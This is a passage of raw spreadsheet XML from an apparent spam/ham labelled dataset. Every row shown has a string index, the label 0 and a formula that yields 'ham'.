        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4431" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4431" t="s">
        <v>3783</v>
      </c>
      <c r="B4431">
        <v>0</v>
      </c>
      <c r="C4431" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4432" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4432" t="s">
        <v>3784</v>
      </c>
      <c r="B4432">
        <v>0</v>
      </c>
      <c r="C4432" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4433" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4433" t="s">
        <v>3785</v>
      </c>
      <c r="B4433">
        <v>0</v>
      </c>
      <c r="C4433" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4434" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4434" t="s">
        <v>3786</v>
      </c>
      <c r="B4434">
        <v>0</v>
      </c>
      <c r="C4434" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4435" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4435" t="s">
        <v>3787</v>
      </c>
      <c r="B4435">
        <v>0</v>
      </c>
      <c r="C4435" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4436" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4436" t="s">
        <v>3788</v>
      </c>
      <c r="B4436">
        <v>0</v>
      </c>
      <c r="C4436" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4437" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4437" t="s">
        <v>3789</v>
      </c>
      <c r="B4437">
        <v>0</v>
      </c>
      <c r="C4437" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4438" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4438" t="s">
        <v>3790</v>
      </c>
      <c r="B4438">
        <v>0</v>
      </c>
      <c r="C4438" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4439" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4439" t="s">
        <v>3791</v>
      </c>
      <c r="B4439">
        <v>0</v>
      </c>
      <c r="C4439" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4440" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4440" t="s">
        <v>3792</v>
      </c>
      <c r="B4440">
        <v>0</v>
      </c>
      <c r="C4440" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4441" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4441" t="s">
        <v>3793</v>
      </c>
      <c r="B4441">
        <v>0</v>
      </c>
      <c r="C4441" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4442" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4442" t="s">
        <v>3794</v>
      </c>
      <c r="B4442">
        <v>0</v>
      </c>
      <c r="C4442" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4443" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4443" t="s">
        <v>3795</v>
      </c>
      <c r="B4443">
        <v>0</v>
      </c>
      <c r="C4443" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4444" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4444" t="s">
        <v>3796</v>
      </c>
      <c r="B4444">
        <v>0</v>
      </c>
      <c r="C4444" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4445" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4445" t="s">
        <v>3797</v>
      </c>
      <c r="B4445">
        <v>0</v>
      </c>
      <c r="C4445" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4446" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4446" t="s">
        <v>3798</v>
      </c>
      <c r="B4446">
        <v>0</v>
      </c>
      <c r="C4446" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4447" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4447" t="s">
        <v>3799</v>
      </c>
      <c r="B4447">
        <v>0</v>
      </c>
      <c r="C4447" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4448" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4448" t="s">
        <v>3800</v>
      </c>
      <c r="B4448">
        <v>0</v>
      </c>
      <c r="C4448" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4449" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4449" t="s">
        <v>3801</v>
      </c>
      <c r="B4449">
        <v>0</v>
      </c>
      <c r="C4449" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4450" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4450" t="s">
        <v>3802</v>
      </c>
      <c r="B4450">
        <v>0</v>
      </c>
      <c r="C4450" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4451" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4451" t="s">
        <v>3803</v>
      </c>
      <c r="B4451">
        <v>0</v>
      </c>
      <c r="C4451" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4452" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4452" t="s">
        <v>3804</v>
      </c>
      <c r="B4452">
        <v>0</v>
      </c>
      <c r="C4452" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4453" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4453" t="s">
        <v>3805</v>
      </c>
      <c r="B4453">
        <v>0</v>
      </c>
      <c r="C4453" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4454" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4454" t="s">
        <v>3806</v>
      </c>
      <c r="B4454">
        <v>0</v>
      </c>
      <c r="C4454" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4455" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4455" t="s">
        <v>3807</v>
      </c>
      <c r="B4455">
        <v>0</v>
      </c>
      <c r="C4455" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4456" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4456" t="s">
        <v>3808</v>
      </c>
      <c r="B4456">
        <v>0</v>
      </c>
      <c r="C4456" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4457" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4457" t="s">
        <v>3809</v>
      </c>
      <c r="B4457">
        <v>0</v>
      </c>
      <c r="C4457" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4458" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4458" t="s">
        <v>3810</v>
      </c>
      <c r="B4458">
        <v>0</v>
      </c>
      <c r="C4458" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4459" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4459" t="s">
        <v>3811</v>
      </c>
      <c r="B4459">
        <v>0</v>
      </c>
      <c r="C4459" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4460" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4460" t="s">
        <v>3812</v>
      </c>
      <c r="B4460">
        <v>0</v>
      </c>
      <c r="C4460" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4461" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4461" t="s">
        <v>3813</v>
      </c>
      <c r="B4461">
        <v>0</v>
      </c>
      <c r="C4461" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4462" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4462" t="s">
        <v>3814</v>
      </c>
      <c r="B4462">
        <v>0</v>
      </c>
      <c r="C4462" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4463" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4463" t="s">
        <v>3815</v>
      </c>
      <c r="B4463">
        <v>0</v>
      </c>
      <c r="C4463" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4464" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4464" t="s">
        <v>3816</v>
      </c>
      <c r="B4464">
        <v>0</v>
      </c>
      <c r="C4464" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4465" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4465" t="s">
        <v>3817</v>
      </c>
      <c r="B4465">
        <v>0</v>
      </c>
      <c r="C4465" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4466" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4466" t="s">
        <v>3818</v>
      </c>
      <c r="B4466">
        <v>0</v>
      </c>
      <c r="C4466" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4467" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4467" t="s">
        <v>3819</v>
      </c>
      <c r="B4467">
        <v>0</v>
      </c>
      <c r="C4467" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4468" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4468" t="s">
        <v>3820</v>
      </c>
      <c r="B4468">
        <v>0</v>
      </c>
      <c r="C4468" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4469" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4469" t="s">
        <v>3821</v>
      </c>
      <c r="B4469">
        <v>0</v>
      </c>
      <c r="C4469" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4470" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4470" t="s">
        <v>3822</v>
      </c>
      <c r="B4470">
        <v>0</v>
      </c>
      <c r="C4470" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4471" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4471" t="s">
        <v>3823</v>
      </c>
      <c r="B4471">
        <v>0</v>
      </c>
      <c r="C4471" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4472" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4472" t="s">
        <v>3824</v>
      </c>
      <c r="B4472">
        <v>0</v>
      </c>
      <c r="C4472" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4473" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4473" t="s">
        <v>3825</v>
      </c>
      <c r="B4473">
        <v>0</v>
      </c>
      <c r="C4473" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4474" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4474" t="s">
        <v>3826</v>
      </c>
      <c r="B4474">
        <v>0</v>
      </c>
      <c r="C4474" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4475" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4475" t="s">
        <v>3827</v>
      </c>
      <c r="B4475">
        <v>0</v>
      </c>
      <c r="C4475" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4476" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4476" t="s">
        <v>3828</v>
      </c>
      <c r="B4476">
        <v>0</v>
      </c>
      <c r="C4476" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4477" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4477" t="s">
        <v>3829</v>
      </c>
      <c r="B4477">
        <v>0</v>
      </c>
      <c r="C4477" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4478" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4478" t="s">
        <v>3830</v>
      </c>
      <c r="B4478">
        <v>0</v>
      </c>
      <c r="C4478" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4479" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4479" t="s">
        <v>3831</v>
      </c>
      <c r="B4479">
        <v>0</v>
      </c>
      <c r="C4479" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4480" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4480" t="s">
        <v>3832</v>
      </c>
      <c r="B4480">
        <v>0</v>
      </c>
      <c r="C4480" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4481" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4481" t="s">
        <v>3833</v>
      </c>
      <c r="B4481">
        <v>0</v>
      </c>
      <c r="C4481" t="str">
        <f t="shared" si="69"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4482" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4482" t="s">
        <v>3834</v>
      </c>
      <c r="B4482">
        <v>0</v>
      </c>
      <c r="C4482" t="str">
        <f t="shared" ref="C4482:C4545" si="70">IF(B4482="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4483" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4483" t="s">
        <v>3835</v>
      </c>
      <c r="B4483">
        <v>0</v>
      </c>
      <c r="C4483" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4484" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4484" t="s">
        <v>3836</v>
      </c>
      <c r="B4484">
        <v>0</v>
      </c>
      <c r="C4484" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4485" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4485" t="s">
        <v>3837</v>
      </c>
      <c r="B4485">
        <v>0</v>
      </c>
      <c r="C4485" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4486" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4486" t="s">
        <v>3838</v>
      </c>
      <c r="B4486">
        <v>0</v>
      </c>
      <c r="C4486" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4487" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4487" t="s">
        <v>3839</v>
      </c>
      <c r="B4487">
        <v>0</v>
      </c>
      <c r="C4487" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4488" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4488" t="s">
        <v>3840</v>
      </c>
      <c r="B4488">
        <v>0</v>
      </c>
      <c r="C4488" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4489" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4489" t="s">
        <v>3841</v>
      </c>
      <c r="B4489">
        <v>0</v>
      </c>
      <c r="C4489" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4490" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4490" t="s">
        <v>3842</v>
      </c>
      <c r="B4490">
        <v>0</v>
      </c>
      <c r="C4490" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4491" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4491" t="s">
        <v>3843</v>
      </c>
      <c r="B4491">
        <v>0</v>
      </c>
      <c r="C4491" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4492" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4492" t="s">
        <v>3844</v>
      </c>
      <c r="B4492">
        <v>0</v>
      </c>
      <c r="C4492" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4493" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4493" t="s">
        <v>3845</v>
      </c>
      <c r="B4493">
        <v>0</v>
      </c>
      <c r="C4493" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4494" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4494" t="s">
        <v>3846</v>
      </c>
      <c r="B4494">
        <v>0</v>
      </c>
      <c r="C4494" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4495" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4495" t="s">
        <v>3847</v>
      </c>
      <c r="B4495">
        <v>0</v>
      </c>
      <c r="C4495" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4496" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4496" t="s">
        <v>3848</v>
      </c>
      <c r="B4496">
        <v>0</v>
      </c>
      <c r="C4496" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4497" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4497" t="s">
        <v>3849</v>
      </c>
      <c r="B4497">
        <v>0</v>
      </c>
      <c r="C4497" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4498" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4498" t="s">
        <v>3850</v>
      </c>
      <c r="B4498">
        <v>0</v>
      </c>
      <c r="C4498" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4499" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4499" t="s">
        <v>3851</v>
      </c>
      <c r="B4499">
        <v>0</v>
      </c>
      <c r="C4499" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4500" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4500" t="s">
        <v>3852</v>
      </c>
      <c r="B4500">
        <v>0</v>
      </c>
      <c r="C4500" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4501" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4501" t="s">
        <v>3853</v>
      </c>
      <c r="B4501">
        <v>0</v>
      </c>
      <c r="C4501" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4502" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4502" t="s">
        <v>3854</v>
      </c>
      <c r="B4502">
        <v>0</v>
      </c>
      <c r="C4502" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4503" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4503" t="s">
        <v>3855</v>
      </c>
      <c r="B4503">
        <v>0</v>
      </c>
      <c r="C4503" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4504" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4504" t="s">
        <v>3856</v>
      </c>
      <c r="B4504">
        <v>0</v>
      </c>
      <c r="C4504" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4505" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4505" t="s">
        <v>3857</v>
      </c>
      <c r="B4505">
        <v>0</v>
      </c>
      <c r="C4505" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4506" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4506" t="s">
        <v>3858</v>
      </c>
      <c r="B4506">
        <v>0</v>
      </c>
      <c r="C4506" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4507" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4507" t="s">
        <v>3859</v>
      </c>
      <c r="B4507">
        <v>0</v>
      </c>
      <c r="C4507" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4508" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4508" t="s">
        <v>3860</v>
      </c>
      <c r="B4508">
        <v>0</v>
      </c>
      <c r="C4508" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4509" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4509" t="s">
        <v>3861</v>
      </c>
      <c r="B4509">
        <v>0</v>
      </c>
      <c r="C4509" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4510" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4510" t="s">
        <v>3862</v>
      </c>
      <c r="B4510">
        <v>0</v>
      </c>
      <c r="C4510" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4511" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4511" t="s">
        <v>3863</v>
      </c>
      <c r="B4511">
        <v>0</v>
      </c>
      <c r="C4511" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4512" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4512" t="s">
        <v>3864</v>
      </c>
      <c r="B4512">
        <v>0</v>
      </c>
      <c r="C4512" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4513" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4513" t="s">
        <v>3865</v>
      </c>
      <c r="B4513">
        <v>0</v>
      </c>
      <c r="C4513" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4514" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4514" t="s">
        <v>3866</v>
      </c>
      <c r="B4514">
        <v>0</v>
      </c>
      <c r="C4514" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4515" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4515" t="s">
        <v>3867</v>
      </c>
      <c r="B4515">
        <v>0</v>
      </c>
      <c r="C4515" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4516" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4516" t="s">
        <v>3868</v>
      </c>
      <c r="B4516">
        <v>0</v>
      </c>
      <c r="C4516" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4517" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4517" t="s">
        <v>3869</v>
      </c>
      <c r="B4517">
        <v>0</v>
      </c>
      <c r="C4517" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4518" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4518" t="s">
        <v>3870</v>
      </c>
      <c r="B4518">
        <v>0</v>
      </c>
      <c r="C4518" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4519" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4519" t="s">
        <v>3871</v>
      </c>
      <c r="B4519">
        <v>0</v>
      </c>
      <c r="C4519" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4520" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4520" t="s">
        <v>3872</v>
      </c>
      <c r="B4520">
        <v>0</v>
      </c>
      <c r="C4520" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4521" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4521" t="s">
        <v>3873</v>
      </c>
      <c r="B4521">
        <v>0</v>
      </c>
      <c r="C4521" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4522" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4522" t="s">
        <v>3874</v>
      </c>
      <c r="B4522">
        <v>0</v>
      </c>
      <c r="C4522" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4523" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4523" t="s">
        <v>3875</v>
      </c>
      <c r="B4523">
        <v>0</v>
      </c>
      <c r="C4523" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4524" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4524" t="s">
        <v>3876</v>
      </c>
      <c r="B4524">
        <v>0</v>
      </c>
      <c r="C4524" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4525" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4525" t="s">
        <v>3877</v>
      </c>
      <c r="B4525">
        <v>0</v>
      </c>
      <c r="C4525" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4526" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4526" t="s">
        <v>3878</v>
      </c>
      <c r="B4526">
        <v>0</v>
      </c>
      <c r="C4526" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4527" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4527" t="s">
        <v>3879</v>
      </c>
      <c r="B4527">
        <v>0</v>
      </c>
      <c r="C4527" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4528" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4528" t="s">
        <v>3880</v>
      </c>
      <c r="B4528">
        <v>0</v>
      </c>
      <c r="C4528" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4529" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4529" t="s">
        <v>3881</v>
      </c>
      <c r="B4529">
        <v>0</v>
      </c>
      <c r="C4529" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4530" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4530" t="s">
        <v>3882</v>
      </c>
      <c r="B4530">
        <v>0</v>
      </c>
      <c r="C4530" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4531" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4531" t="s">
        <v>3883</v>
      </c>
      <c r="B4531">
        <v>0</v>
      </c>
      <c r="C4531" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4532" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4532" t="s">
        <v>3884</v>
      </c>
      <c r="B4532">
        <v>0</v>
      </c>
      <c r="C4532" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4533" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4533" t="s">
        <v>3885</v>
      </c>
      <c r="B4533">
        <v>0</v>
      </c>
      <c r="C4533" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4534" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4534" t="s">
        <v>3886</v>
      </c>
      <c r="B4534">
        <v>0</v>
      </c>
      <c r="C4534" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4535" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4535" t="s">
        <v>3887</v>
      </c>
      <c r="B4535">
        <v>0</v>
      </c>
      <c r="C4535" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4536" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4536" t="s">
        <v>3888</v>
      </c>
      <c r="B4536">
        <v>0</v>
      </c>
      <c r="C4536" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4537" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4537" t="s">
        <v>3889</v>
      </c>
      <c r="B4537">
        <v>0</v>
      </c>
      <c r="C4537" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4538" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4538" t="s">
        <v>3890</v>
      </c>
      <c r="B4538">
        <v>0</v>
      </c>
      <c r="C4538" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4539" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4539" t="s">
        <v>3891</v>
      </c>
      <c r="B4539">
        <v>0</v>
      </c>
      <c r="C4539" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4540" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4540" t="s">
        <v>3892</v>
      </c>
      <c r="B4540">
        <v>0</v>
      </c>
      <c r="C4540" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4541" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4541" t="s">
        <v>3893</v>
      </c>
      <c r="B4541">
        <v>0</v>
      </c>
      <c r="C4541" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4542" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4542" t="s">
        <v>3894</v>
      </c>
      <c r="B4542">
        <v>0</v>
      </c>
      <c r="C4542" t="str">
        <f t="shared" si="70"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4543" spans="1:3" x14ac:dyDescent="0.3">
